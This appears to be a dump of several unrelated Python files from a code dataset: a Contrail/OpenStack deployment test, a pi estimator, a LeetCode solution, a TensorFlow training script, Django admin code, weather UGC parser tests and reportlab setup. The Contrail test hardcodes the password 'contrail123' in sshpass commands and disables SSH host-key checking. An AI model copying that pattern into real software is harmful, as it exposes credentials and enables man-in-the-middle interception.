cls.inputs.dpdk_ips:\n cls.agg_id['kernel-computes'] = cls.connections.orch.create_agg(\n 'kernel-computes',\n 'kernel-computes')\n host_list = cls.connections.orch.get_hosts()\n cls.nova_hosts = copy.deepcopy(host_list)\n cls.connections.orch.add_host_to_agg(cls.agg_id['kernel-computes'],\n cls.nova_hosts)\n else:\n cls.agg_id['kernel-computes'] = cls.connections.orch.create_agg(\n 'kernel-computes',\n 'kernel-computes')\n cls.agg_id['dpdk-computes'] = cls.connections.orch.create_agg(\n 'dpdk-computes',\n 'dpdk-computes')\n host_list = cls.connections.orch.get_hosts()\n cls.dpdk_hosts = [cls.inputs.host_data[host]['fqname'] \\\n for host in cls.inputs.dpdk_ips]\n cls.nova_hosts = copy.deepcopy(host_list)\n for host in host_list:\n if host in cls.dpdk_hosts:\n cls.nova_hosts.remove(host)\n 
cls.connections.orch.add_host_to_agg(cls.agg_id['kernel-computes'],\n cls.nova_hosts) \n cls.connections.orch.add_host_to_agg(cls.agg_id['dpdk-computes'],\n cls.dpdk_hosts) \n\n #Floating IP creation.\n if cls.fip == True:\n #Create IPAM\n cls.ipam_obj = IPAMFixture(connections=cls.connections,\n name='public-net')\n cls.ipam_obj.setUp()\n cls.ipam_obj.verify_on_setup()\n\n #Create VN\n cls.pub_vn_fixture = VNFixture(\n project_name=cls.project.project_name,\n connections=cls.connections,\n vn_name='public-net',\n inputs=cls.inputs,\n subnets=[cls.inputs.fip_pool],\n ipam_fq_name=cls.ipam_obj.fq_name)\n cls.pub_vn_fixture.setUp()\n cls.pub_vn_fixture.verify_on_setup()\n\n #Create FIP pool\n cls.fip_fixture = FloatingIPFixture(\n project_name=cls.project.project_name,\n connections=cls.connections,\n inputs=cls.inputs,\n pool_name='public-net',\n vn_id=cls.pub_vn_fixture.vn_id)\n cls.fip_fixture.setUp()\n cls.fip_fixture.verify_on_setup()\n\n #Create FIP stack\n cls.fip_template_file=cls.deploy_path+\"template/vepg_floating.yaml\"\n with open(cls.fip_template_file, 'r') as fd:\n cls.fip_template = yaml.load(fd, Loader=yaml.FullLoader)\n\n cls.fip_stack = HeatStackFixture(\n connections=cls.connections,\n stack_name=cls.connections.project_name+'_fip',\n template=cls.fip_template)\n cls.fip_stack.setUp()\n\n #Create FIP assignment env parameter for vepg creation.\n cls.fip_env_file=cls.deploy_path+\"env/vepg_b2b_main.yaml\"\n with open(cls.fip_env_file, 'r') as fd:\n cls.fip_env = yaml.load(fd, Loader=yaml.FullLoader)\n\n for fip_dict in cls.fip_stack.heat_client_obj.stacks.get(\n cls.fip_stack.stack_name).outputs:\n if 'floatip' in fip_dict['output_key']:\n if cls.fip_env['parameters'] is not None:\n cls.fip_env['parameters'].update(\n {fip_dict['output_key']:fip_dict['output_value']})\n else:\n cls.fip_env['parameters'] = \\\n {fip_dict['output_key']:fip_dict['output_value']}\n\n #Create VEPG.\n if cls.fip == True:\n cls.vepg_template_file=cls.deploy_path+\"template/vepg_b2b_main.yaml\"\n with open(cls.vepg_template_file, 'r') as fd:\n cls.vepg_template = yaml.load(fd, Loader=yaml.FullLoader)\n\n for each_resource in cls.vepg_template['resources']:\n if 'personality' in cls.vepg_template['resources']\\\n [each_resource]['properties']:\n inject_file='/config/junos-config/configuration.txt'\n fp1=open(cls.vepg_template['resources'][each_resource]\\\n ['properties']['personality'][inject_file]\\\n ['get_file'], 'r')\n data=fp1.read()\n cls.vepg_template['resources'][each_resource]['properties']\\\n ['personality'][inject_file]=data\n fp1.close()\n if 'commit_config' in cls.vepg_template['resources']\\\n [each_resource]['properties']\\\n ['personality'].keys()[0]:\n inject_file='/config/junos-config/commit_config.sh'\n fp2=open(cls.vepg_template['resources'][each_resource]\\\n ['properties']['personality'][inject_file]\\\n ['get_file'], 'r')\n data2=fp2.read()\n cls.vepg_template['resources'][each_resource]\\\n ['properties']['personality'][inject_file]=data2\n fp2.close()\n\n cls.vepg_stack = HeatStackFixture(\n connections=cls.connections,\n stack_name=cls.connections.project_name+'_vepg',\n template=cls.vepg_template, env=cls.fip_env,\n timeout_mins=15)\n cls.vepg_stack.setUp()\n else:\n cls.vepg_template_file=cls.deploy_path+\"template/vepg_b2b_main.yaml\"\n with open(cls.vepg_template_file, 'r') as fd:\n cls.vepg_template = yaml.load(fd, Loader=yaml.FullLoader)\n\n for each_resource in cls.vepg_template['resources']:\n if 'personality' in cls.vepg_template['resources']\\\n 
[each_resource]['properties']:\n                    inject_file='/config/junos-config/configuration.txt'\n                    fp1=open(cls.vepg_template['resources'][each_resource]\\\n                        ['properties']['personality'][inject_file]\\\n                        ['get_file'], 'r')\n                    data=fp1.read()\n                    cls.vepg_template['resources'][each_resource]['properties']\\\n                        ['personality'][inject_file]=data\n                    fp1.close()\n            \n            cls.vepg_stack = HeatStackFixture(\n                connections=cls.connections,\n                stack_name=cls.connections.project_name+'_vepg',\n                template=cls.vepg_template,\n                timeout_mins=15)\n            cls.vepg_stack.setUp()\n\n        # Get VM details and setup vsrx\n        op = cls.vepg_stack.heat_client_obj.stacks.get(\n            cls.vepg_stack.stack_name).outputs\n        vsfo_fix = dict()\n        for output in op:\n            key = output['output_key']\n            for i in range(1,cls.NB_VSFO_CP_NODES+1):\n                vsfo = \"vsfo_%s_id\" %(i)\n                if key == vsfo:\n                    vsfo_uuid = output['output_value']\n                    vsfo_fix[i] = VMFixture(connections=cls.connections,uuid = vsfo_uuid, image_name = 'VSFO-CP-IMAGE')\n                    vsfo_fix[i].read()\n                    vsfo_fix[i].verify_on_setup()\n                i = i + 1\n\n            for i in range(cls.NB_VSFO_CP_NODES+1 ,cls.NB_VSFO_CP_NODES + cls.NB_VSFO_UP_NODES+1):\n                vsfo = \"vsfo_%s_id\" %(i)\n                if key == vsfo:\n                    vsfo_uuid = output['output_value']\n                    vsfo_fix[i] = VMFixture(connections=cls.connections,uuid = vsfo_uuid, image_name = 'VSFO-UP-IMAGE')\n                    vsfo_fix[i].read()\n                    vsfo_fix[i].verify_on_setup()\n                i = i+1\n\n            if key == \"vrp_31_id\":\n                vrp31_uuid = output['output_value']\n                vrp_31 = VMFixture(connections=cls.connections,uuid = vrp31_uuid, image_name = 'VRP-IMAGE')\n                vrp_31.read()\n                vrp_31.verify_on_setup()\n\n            if key == \"vrp_32_id\":\n                vrp32_uuid = output['output_value']\n                vrp_32 = VMFixture(connections=cls.connections,uuid = vrp32_uuid, image_name = 'VRP-IMAGE')\n                vrp_32.read()\n                vrp_32.verify_on_setup()\n\n        cls.vsfo_fix = vsfo_fix\n        cls.vrp_31 = vrp_31\n        cls.vrp_32 = vrp_32\n\n        # Copy scale config files and apply config if scaled setup.\n        if 'orange' in cls.deploy_path:\n            for i in range(1, cls.NB_VSFO_CP_NODES + cls.NB_VSFO_UP_NODES+1):\n                cls.vsfo_fix[i].vm_password='contrail123'\n                file_name=cls.deploy_path+'vsrx_config/'+\\\n                    cls.vsfo_fix[i].vm_name.split('B2B-')[1].lower()+\\\n                    '_config.txt'\n                cmd='sshpass -p \\'%s\\'' %(cls.vsfo_fix[i].vm_password)\n                cmd=cmd+' scp -o StrictHostKeyChecking=no %s heat-admin@%s:/tmp/'\\\n                    %(file_name, cls.vsfo_fix[i].vm_node_ip)\n                op=os.system(cmd)\n                if op != 0:\n                    cls.logger.error(\"Failed to copy vsrx config file %s to %s\"\\\n                        %(file_name, cls.vsfo_fix[i].vm_node_ip))\n                file_name='/tmp/'+cls.vsfo_fix[i].vm_name.split('B2B-')[1].lower()+\\\n                    '_config.txt'\n                cmd='sshpass -p \\'%s\\' ssh -o StrictHostKeyChecking=no heat-admin@%s \\\n                    sshpass -p \\'%s\\' scp -o StrictHostKeyChecking=no -o \\\n                    UserKnownHostsFile=/dev/null %s root@%s:/tmp/'\\\n                    %(cls.vsfo_fix[i].vm_password, cls.vsfo_fix[i].vm_node_ip,\n                    cls.vsfo_fix[i].vm_password, file_name,\n                    cls.vsfo_fix[i].local_ip)\n                op=os.system(cmd)\n                if op != 0:\n                    cls.logger.error(\"Failed to copy vsrx config file %s to %s\"\\\n                        %(file_name, cls.vsfo_fix[i].local_ip))\n                cmd='sshpass -p \\'%s\\' ssh -o StrictHostKeyChecking=no heat-admin@%s \\\n                    sshpass -p \\'%s\\' ssh -o StrictHostKeyChecking=no -o \\\n                    UserKnownHostsFile=/dev/null \\\n                    root@%s \\'sh /config/junos-config/commit_config.sh\\' '\\\n                    %(cls.vsfo_fix[i].vm_password, cls.vsfo_fix[i].vm_node_ip,\n                    cls.vsfo_fix[i].vm_password, cls.vsfo_fix[i].local_ip)\n                op=os.popen(cmd).read()\n                if 'commit complete' not in op:\n                    cls.logger.error(\"Failed to commit vsrx config on %s\"\\\n                        %(cls.vsfo_fix[i].vm_name))\n\n        # 
Create BGPaaS stacks.\n #Define variables for template file, env file, bgpaas stack and\n #bfd_health_check_uuid\n cls.bgpaas_stack_status=True\n cls.bgpaas_env_f=glob.glob(cls.deploy_path+'env/VEPG_BGP*')\n cls.bgpaas_template_f=[]\n cls.bgpaas_env={}\n cls.bgpaas_template={}\n cls.bfd_hc_uuid=None\n cls.bgpaas_stacks={}\n #Get bfd_health_check_uuid from the vepg stack created earlier.\n for list_item in cls.vepg_stack.heat_client_obj.stacks.get(\n cls.vepg_stack.stack_name).outputs:\n if list_item['output_key'] == 'bfd_health_check':\n cls.bfd_hc_uuid=list_item['output_value']\n #Fail if no bfd_health_check_uuid received.\n if not cls.bfd_hc_uuid:\n cls.logger.error(\"No BFD Health check uuid found !!!\")\n cls.bgpaas_stack_status=False\n return False\n #Create BGPaaS stack for each template file using corresponding env file\n #from env dir.\n for each_bef in cls.bgpaas_env_f:\n with open(each_bef, 'r') as fd:\n cls.bgpaas_env[each_bef] = yaml.load(fd, Loader=yaml.FullLoader)\n t1=re.findall(\"VSFO\\d\", each_bef)\n t2=re.findall(\"EXT\\d\", each_bef)\n #for each of the env file create vsfo_key to get vsfo uuid from\n #vepg stack.\n vsfo_key=t1[0].lower()[:4]+'_'+t1[0].lower()[4:]+'_'+\\\n t2[0].lower()[:3]+'_'+t2[0].lower()[3:]\n vsfo_uuid=None\n for list_item in cls.vepg_stack.heat_client_obj.stacks.get(\n cls.vepg_stack.stack_name).outputs:\n if list_item['output_key'] == vsfo_key:\n #get vsfo uuid to be updated in env file\n vsfo_uuid=list_item['output_value']\n break\n vsfo_env_key=None\n #get the vsfo key name from env file that needs to be updated with\n #the uuid.\n for key, value in cls.bgpaas_env[each_bef]['parameters'].items():\n if 'vsfo' in key:\n vsfo_env_key=key\n #update the bfd_health_check_uuid in env file.\n cls.bgpaas_env[each_bef]['parameters']['bfd_health_check_uuid']=\\\n cls.bfd_hc_uuid\n #update the vsfo_env_key in env file.\n cls.bgpaas_env[each_bef]['parameters'][vsfo_env_key]=vsfo_uuid\n #create string to find relevant template files for this\n #environment file.\n t=t1[0].lower()+'_'+t2[0].lower()\n cls.bgpaas_template_f=glob.glob(cls.deploy_path+'template/'+t+'*')\n #Create BGPaaS stack for each template file for this env.\n for each_btf in cls.bgpaas_template_f:\n #generate stack name based on env file name and number of APN's.\n stack_name=re.findall('VEPG\\w*',each_bef)[0]+\\\n re.findall('apn_\\d*_\\d*',each_btf)[0][3:]\n with open(each_btf, 'r') as fd:\n cls.bgpaas_template[each_btf] = yaml.load(fd,\n Loader=yaml.FullLoader)\n cls.bgpaas_stacks[stack_name] = HeatStackFixture(\n connections=cls.connections,\n stack_name=stack_name,\n template=cls.bgpaas_template[each_btf],\n env=cls.bgpaas_env[each_bef],\n timeout_mins=10)\n cls.bgpaas_stacks[stack_name].setUp()\n\n #end setup_vepg\n\n @classmethod\n def delete_vepg(cls):\n for each_stack in cls.bgpaas_stacks:\n cls.bgpaas_stacks[each_stack].cleanUp()\n\n #Delete vepg Stack\n cls.vepg_stack.cleanUp()\n\n #Delete fip stack, fip pool VN and ipam.\n cls.fip_stack.cleanUp()\n cls.fip_fixture.cleanUp()\n cls.pub_vn_fixture.cleanUp()\n cls.ipam_obj.cleanUp()\n\n #Delete AZ\n cls.connections.orch.del_host_from_agg(cls.agg_id['kernel-computes'],\n cls.nova_hosts)\n cls.connections.orch.delete_agg(cls.agg_id['kernel-computes'])\n if 'dpdk_hosts' in dir(cls):\n cls.connections.orch.del_host_from_agg(cls.agg_id['dpdk-computes'],\n cls.dpdk_hosts)\n cls.connections.orch.delete_agg(cls.agg_id['dpdk-computes'])\n\n #Delete Flavor Stack\n cls.flavors_stack.cleanUp()\n\n #Delete Quota Stack\n cls.quota_stack.cleanUp()\n 
return True\n    #end delete_vepg\n\n    @preposttest_wrapper\n    def test_orange_deploy(self):\n        ''' Dummy test routine to be changed in later commits.\n        '''\n        result = True\n        self.logger.info(\"Running test orange deployment.\")\n        self.logger.info(self.connections.project_name)\n        self.logger.info(self.connections.username)\n\n        return True\n    # end test_orange_deploy\n\n    @preposttest_wrapper\n    def test_02_interface_check(self):\n        ''' CEM-16881\n        Check virtual instances are properly started with network connectivity.\n        '''\n\n        ips_list=[]\n        vm_fix_list=[self.vrp_31, self.vrp_32]\n\n        #get list of all vm fixtures\n        for i in range(1, self.NB_VSFO_CP_NODES + self.NB_VSFO_UP_NODES+1):\n            vm_fix_list.append(self.vsfo_fix[i])\n\n        #get ge-0/0/0.0 i/f ip of each vm\n        for i in range(0, self.NB_VSFO_CP_NODES + self.NB_VSFO_UP_NODES+2):\n            cmd = \"sshpass -p contrail123 ssh -o StrictHostKeyChecking=no -o \\\n                UserKnownHostsFile=/dev/null -J \\\n                \\\"%s@%s\\\" -o GlobalKnownHostsFile=/dev/null root@%s \\\n                \\\"ifconfig | grep 192.3.1 | cut -d ' ' -f 4 | cut -d = -f 2\\\"\"\\\n                %(self.inputs.host_data[vm_fix_list[i].vm_node_ip]['username'] ,\n                vm_fix_list[i].vm_node_ip,vm_fix_list[i].local_ip)\n            output = os.popen(cmd).read()\n            output1=output.replace(\"\\n\",\"\")\n            ips_list.append(output1)\n\n        #each vm should ping every other adjacent vm (ex: 4 vms, 6 ping sessions)\n        for i in range(0, self.NB_VSFO_CP_NODES + self.NB_VSFO_UP_NODES+2):\n            #loop to perform ping\n            for j in range(i+1, self.NB_VSFO_CP_NODES + self.NB_VSFO_UP_NODES+2):\n                cmd = \"sshpass -p contrail123 ssh -o StrictHostKeyChecking=no -o \\\n                    UserKnownHostsFile=/dev/null -J \\\n                    \\\"%s@%s\\\" -o GlobalKnownHostsFile=/dev/null \\\n                    root@%s \\\"ping -c 3 %s\\\"\"\\\n                    %(self.inputs.host_data[vm_fix_list[i].vm_node_ip]['username'] ,\n                    vm_fix_list[i].vm_node_ip,vm_fix_list[i].local_ip,ips_list[j])\n                output = os.popen(cmd).read()\n                print(output)\n                if '0% packet loss' not in output:\n                    self.logger.error(\" Ping from %s to %s FAILED!!\",\n                        vm_fix_list[i].vm_name,vm_fix_list[j].vm_name)\n                else:\n                    self.logger.info(\" Ping from %s to %s PASSED!!\",\n                        vm_fix_list[i].vm_name,vm_fix_list[j].vm_name)\n\n        return True\n    # end test_02_interface_check\n#end class OrangeSolutionTest\n","sub_path":"serial_scripts/solution/test_orange_solution.py","file_name":"test_orange_solution.py","file_ext":"py","file_size_in_byte":22895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"7653585","text":"\"\"\"Pi calculation\"\"\"\nfrom random import random\nfrom time import perf_counter\n\n\"\"\"Approximate calculation\"\"\"\n# formula: 1/pow(16,k)*(4/(8*k+1)-2/(8*k+4)-1/(8*k+5)-1/(8*k+6))\npi = 0\nN = 100\nfor k in range(N):\n    pi += 1 / pow(16, k) * (4 / (8 * k + 1) - 2 / (8 * k + 4) - 1 / (8 * k + 5) - 1 / (8 * k + 6))\nprint(\"{}\".format(pi))\n\n# Monte Carlo (throwing darts blindfolded)\nDARTS = 1000 * 1000\nhits = 0.0\nstart = perf_counter()\nfor i in range(1, DARTS + 1):\n    x, y = random(), random()\n    dist = pow(x ** 2 + y ** 2, 0.5)\n    if dist <= 1.0:\n        hits = hits + 1\npi = 4 * (hits / DARTS)\nprint(\"{}\".format(pi))\nprint(\"{}\".format(perf_counter() - start))\n","sub_path":"L4/5_PI.py","file_name":"5_PI.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"22591826","text":"\"\"\"\nhttps://leetcode.com/problems/binary-tree-paths/\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n    def 
__str__(self):\n return str(self.val)\n\nclass Solution:\n \"\"\"\n Recursive\n \"\"\"\n def binaryTreePaths(self, node):\n if not node:\n return []\n\n if not (node.left or node.right):\n return [str(node.val)]\n\n left_paths = self.binaryTreePaths(node.left)\n right_paths = self.binaryTreePaths(node.right)\n\n left_paths = [str(node.val) + '->' + path for path in left_paths]\n right_paths = [str(node.val) + '->' + path for path in right_paths]\n\n return left_paths + right_paths\n\n\nnode1 = TreeNode(1)\nnode2 = TreeNode(2)\nnode3 = TreeNode(3)\nnode5 = TreeNode(5)\n\nnode1.left = node2\nnode1.right = node3\nnode2.right = node5\n\n\nprint(Solution().binaryTreePaths(node1))\n\n\n","sub_path":"leetcode/binary-tree-paths/binary-tree-paths2.py","file_name":"binary-tree-paths2.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"147883070","text":"import tensorflow as tf\nimport numpy as np\nfrom dhbc_slim import DHBC_FCN\nfrom losses import softmax_cross_entropy\nimport config\nimport random\nimport cv2 as cv\nimport os\nimport time\nimport tensorflow.contrib.slim as slim\n\nproject_path = 'D:\\\\Project\\\\DHBC\\\\'\nstart_step = 0\n\n# train\nlearning_rate = 0.0001\ntraining_iters = 200000\nbatch_size = 128\n\n# log and display\nlogs_dir = project_path + 'log-sas\\\\'\ncheckpoints_dir = logs_dir + 'checkpoints\\\\'\ncheckpoint_step = 1000\n\ndisplay_dir = logs_dir + 'display\\\\'\ndisplay_step = 20\n\nrandom.seed()\n\n# prepare color transition\ncolor2int_dense = {(0, 0, 0): 0}\nint2color_dense = {0: (0, 0, 0)}\nfor i in range(config.num_dense_color):\n color = config.int2color(i + 1, config.num_dense_color + 1)\n color = (int(255 * color[0]), int(255 * color[1]), int(255 * color[2]))\n int2color_dense[i + 1] = color\n color2int_dense[color] = i + 1\n \ndef random_batch(model_idx, segmentation_idx, batch_size):\n batch_depth = np.zeros([batch_size, 21, 21, 1], dtype=np.uint8)\n batch_label_dense = np.zeros([batch_size, 1, 1], dtype=np.int64)\n \n view_cands = random.sample([(i, j) for i in range(config.num_mesh[model_idx]) for j in range(144)], batch_size)\n batch = 0\n for view in view_cands:\n depth_view_path = config.get_depth_view_path(model_idx, view[0], view[1])\n depth_view = cv.imread(depth_view_path, -1)\n while 1:\n x, y = random.randint(0, 512 - 21), random.randint(0, 512 - 21)\n if depth_view[x + 10, y + 10] > 0:\n break\n batch_depth[batch, :, :, 0] = depth_view[x:x+21, y:y+21]\n \n segmentation_view_path = config.get_segmentation_view_path(model_idx, view[0], segmentation_idx, view[1])\n segmentation_view = cv.imread(segmentation_view_path, -1)\n x, y = x + 10, y + 10\n color = (segmentation_view[x, y, 0], segmentation_view[x, y, 1], segmentation_view[x, y, 2])\n batch_label_dense[batch, 0, 0] = color2int_dense[color] - 1\n batch += 1\n return batch_depth, batch_label_dense\n \ndef timeit(t=None):\n if t:\n print(\"Time elapse: \" + str(time.time() - t))\n return time.time()\n\nif __name__ == '__main__':\n \n with tf.device('/gpu:0'):\n tf.reset_default_graph()\n \n x_depth = tf.placeholder(tf.float32, [None, 21, 21, 1])\n y_label_dense = tf.placeholder(tf.int64, [None, 1, 1])\n \n t = timeit()\n print(\"Set up inference model...\")\n \n model = DHBC_FCN()\n model.inference_sas(x_depth)\n \n t = timeit(t)\n print(\"Set up cost and optimizer...\")\n \n costs = {}\n optimizers = {}\n accuracies = {}\n for model_idx in range(1):\n for segmentation_idx in range(config.num_seg):\n 
branch = model.get_branch_name(model_idx, segmentation_idx)\n                costs[branch] = tf.losses.sparse_softmax_cross_entropy(labels=y_label_dense, logits=model.preds[branch], loss_collection=None)\n                optimizers[branch] = tf.train.AdamOptimizer().minimize(costs[branch])\n                accuracies[branch] = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(model.preds[branch], axis=-1), y_label_dense), tf.float32))\n        \n        saver = tf.train.Saver(max_to_keep=10)\n        \n        with tf.Session() as sess:\n            t = timeit(t)\n            print(\"Initialize variables...\")\n            sess.run(tf.global_variables_initializer())\n            \n            ckpt_path = checkpoints_dir + 'model-' + str(start_step)\n            if os.path.exists(ckpt_path + '.meta'):\n                t = timeit(t)\n                print(\"Restore model at step {0}...\".format(start_step))\n                saver.restore(sess, ckpt_path)\n                step = start_step + 1\n            else:\n                print(\"No snapshot at step {0}, training from scratch...\".format(start_step))\n                step = 1\n            \n            t = timeit(t)\n            while step * batch_size < training_iters:\n                model_idx = random.randint(0, 0)\n                segmentation_idx = random.randint(0, config.num_seg - 1)\n                branch = model.get_branch_name(model_idx, segmentation_idx)    \n                batch_depth, batch_label_dense = random_batch(model_idx, segmentation_idx, batch_size)\n                _, loss, acc= sess.run([optimizers[branch], costs[branch], accuracies[branch]], feed_dict={x_depth: batch_depth, y_label_dense: batch_label_dense})\n                print(branch + \" Step \" + str(step) + \", Loss= {:.6f}\".format(loss) + \", Accuracy= {:.6f}%\".format(acc * 100))\n                \n                #if step % display_step == 0:\n                    #pred = sess.run(tf.nn.softmax(model.pred), feed_dict={x_depth: batch_depth, y_label_dense: batch_label_dense})\n                    #display(step, pred, batch_label_dense)\n                \n                if step % checkpoint_step == 0:\n                    saver.save(sess, checkpoints_dir + 'model', step)\n                    print(\"Save model at step {0}.\".format(step))\n                step += 1\n            print(\"Optimization Finished!\")","sub_path":"train_sas.py","file_name":"train_sas.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"68321909","text":"# Count how many times each digit 0-9 appears across all numbers from start to end (inclusive).\ndef f(s,t):\n    # tally the digits of s into the counter list t\n    if s!=0:\n        for i in [int(x) for x in list(str(s))]:\n            t[i]+=1\n    \n    \nt=[0]*10 \nline=input().strip()\nstart=int(line.split()[0])\nend=int(line.split()[1])\nfor i in range(start,end+1):\n    f(i,t)\nprint(' '.join([str(x) for x in t]),end='')\n\n","sub_path":"Code/CodeRecords/2892/60788/261374.py","file_name":"261374.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"255905907","text":"from django.contrib.auth.models import User\nfrom models import Aanvraag\nfrom django.contrib import admin\n\n\nclass AanvraagAdmin(admin.ModelAdmin):\n\n    list_display = ('user', 'titel', 'begindatum', 'total_costs')\n\n    fieldsets = [\n        (None, {'fields': ['user', 'titel', 'omschrijving']}),\n        ('Data', {'fields': ['begindatum', 'einddatum']}),\n        ('Budget', {'fields': ['kosten_budget', 'uren_budget']}),\n        ('Uiteindelijk', {'fields': ['kosten_actual', 'uren_actual']}),\n        ('Admin', {'fields': ['opmerking_admin', 'aanvraag_status']}),\n    ]\n\nadmin.site.register(Aanvraag, AanvraagAdmin)\n","sub_path":"aanvragen/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"194124527","text":"import unittest\nimport datetime\n\nimport pytz\nfrom pyiem.nws import ugc\n\nSTR1 = \"DCZ001-170200-\"\nSTR2 = 
\"DCZ001-MDZ004>007-009>011-013-014-016>018-VAZ036>042-050>057-170200-\"\n\n\nclass TestObservation(unittest.TestCase):\n\n def test_totextstr(self):\n \"\"\" See if we can generate a proper string from a UGCS \"\"\"\n ugcs = [ugc.UGC(\"DC\", \"Z\", \"001\"), ugc.UGC(\"IA\", \"C\", \"001\"),\n ugc.UGC(\"IA\", \"C\", \"002\")]\n self.assertEquals(ugc.ugcs_to_text(ugcs),\n \"((DCZ001)) [DC] and ((IAC001)), ((IAC002)) [IA]\")\n\n def test_str1(self):\n \"\"\" check ugc.parse of STR1 parsing \"\"\"\n valid = datetime.datetime(2008, 12, 17, 3, 0)\n valid = valid.replace(tzinfo=pytz.timezone('UTC'))\n (ugcs, expire) = ugc.parse(STR1, valid)\n\n expire_answer = valid.replace(hour=2)\n ugcs_answer = [ugc.UGC(\"DC\", \"Z\", \"001\"), ]\n\n self.assertEqual(ugcs, ugcs_answer)\n self.assertEqual(expire, expire_answer)\n\n def test_str2(self):\n \"\"\" check ugc.parse of STR2 parsing \"\"\"\n valid = datetime.datetime(2008, 12, 17, 3, 0)\n valid = valid.replace(tzinfo=pytz.timezone('UTC'))\n (ugcs, expire) = ugc.parse(STR2, valid)\n\n expire_answer = valid.replace(hour=2)\n ugcs_answer = [ugc.UGC(\"DC\", \"Z\", \"001\"), ugc.UGC(\"MD\", \"Z\", \"004\"),\n ugc.UGC(\"MD\", \"Z\", \"005\"), ugc.UGC(\"MD\", \"Z\", \"006\"),\n ugc.UGC(\"MD\", \"Z\", \"007\"), ugc.UGC(\"MD\", \"Z\", \"009\"),\n ugc.UGC(\"MD\", \"Z\", \"010\"), ugc.UGC(\"MD\", \"Z\", \"011\"),\n ugc.UGC(\"MD\", \"Z\", \"013\"), ugc.UGC(\"MD\", \"Z\", \"014\"),\n ugc.UGC(\"MD\", \"Z\", \"016\"), ugc.UGC(\"MD\", \"Z\", \"017\"),\n ugc.UGC(\"MD\", \"Z\", \"018\"), ugc.UGC(\"VA\", \"Z\", \"036\"),\n ugc.UGC(\"VA\", \"Z\", \"037\"), ugc.UGC(\"VA\", \"Z\", \"038\"),\n ugc.UGC(\"VA\", \"Z\", \"039\"), ugc.UGC(\"VA\", \"Z\", \"040\"),\n ugc.UGC(\"VA\", \"Z\", \"041\"), ugc.UGC(\"VA\", \"Z\", \"042\"),\n ugc.UGC(\"VA\", \"Z\", \"050\"), ugc.UGC(\"VA\", \"Z\", \"051\"),\n ugc.UGC(\"VA\", \"Z\", \"052\"), ugc.UGC(\"VA\", \"Z\", \"053\"),\n ugc.UGC(\"VA\", \"Z\", \"054\"), ugc.UGC(\"VA\", \"Z\", \"055\"),\n ugc.UGC(\"VA\", \"Z\", \"056\"), ugc.UGC(\"VA\", \"Z\", \"057\")]\n\n self.assertEqual(ugcs, ugcs_answer)\n self.assertEqual(expire, expire_answer)\n","sub_path":"pyiem/nws/tests/test_ugc.py","file_name":"test_ugc.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"633962151","text":"from traceback import print_last\nimport os, utils, pyprind\nfrom pandas import DataFrame, concat, pivot_table, read_excel\nimport pandas\nfrom copy import deepcopy, copy\nimport numpy as np\nimport spold2_reader as spold2\nfrom reportlab.platypus import Paragraph, Spacer, Table, Image, NextPageTemplate, FrameBreak\nfrom reportlab.platypus.tables import TableStyle\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.lib import colors\nfrom reportlab.rl_config import defaultPageSize\nfrom reportlab.lib.units import inch\nfrom reportlab.platypus.doctemplate import PageTemplate, BaseDocTemplate\nfrom reportlab.platypus.frames import Frame\nimport re\nimport time\necoinvent_red = '#B01C18'\n\nPAGE_HEIGHT=defaultPageSize[1]\nPAGE_WIDTH=defaultPageSize[0]\nMARGIN = (PAGE_WIDTH - 7*inch) / 2. 
- 6\nstyles = getSampleStyleSheet()\nheader_style = deepcopy(styles[\"Normal\"])\nheader_style.fontSize = 8\n\njustified = deepcopy(styles[\"Normal\"])\njustified.alignment = 4\n\nback = deepcopy(styles[\"Normal\"])\nback.alignment = 3\nback.fontSize = 4\n\nbullet = deepcopy(justified)\n\nno_info_style = deepcopy(styles[\"Normal\"])\nno_info_style.alignment = 4\nno_info_style.fontName = 'Helvetica-Oblique'\nno_info_style.textColor = colors.grey\nno_info_style.fontSize = 8\nno_info = Paragraph('No data.', no_info_style)\n\nsmall_table_style = deepcopy(styles[\"Normal\"])\nsmall_table_style.fontSize = 10\n\nlarge_table_style = deepcopy(styles[\"Normal\"])\n\ntitle_style = deepcopy(styles[\"Normal\"])\ntitle_style.fontSize = 12\ntitle_style_TOC = deepcopy(styles[\"Normal\"])\ntitle_style_TOC.fontSize = 12\n\nsmall = deepcopy(styles[\"Normal\"])\nsmall.fontSize = 8\n\nsmall_justified = deepcopy(styles[\"Normal\"])\nsmall_justified.fontSize = 8\nsmall_justified.alignment = 4\n\nsmall_justified_contrib = deepcopy(styles[\"Normal\"])\nsmall_justified_contrib.fontSize = 7\nsmall_justified_contrib.alignment = 4\nsmall_justified_contrib.fontName = 'Helvetica-Oblique'\nsmall_justified_contrib.leading = 6\n\nexplanation_style = deepcopy(styles[\"Normal\"])\nexplanation_style.fontSize = 6\nexplanation_style.fontName = 'Helvetica-Oblique'\nexplanation_style.leading = 6\n\nheader_style_right = deepcopy(header_style)\nheader_style_right.alignment = 3\n\nheader_style_center = deepcopy(header_style)\nheader_style_center.alignment = 1\n\nthick_line = 1.\nthin_line = .25\n\ninter_par_dist = 0.15*inch\nsmall_spacer = 0.05*inch\nmax_comment_length = 1000\nall_table_style = [('VALIGN',(0,0),(-1,-1),'MIDDLE'),\n ('INNERGRID', (0,0), (-1,-1), thin_line, colors.black),\n ('TEXTCOLOR',(0,0),(0,-1), colors.black), \n ]\nv_header = deepcopy(all_table_style)\nv_header.extend([\n ('BACKGROUND',(0,0),(0,-1), colors.lightgrey), 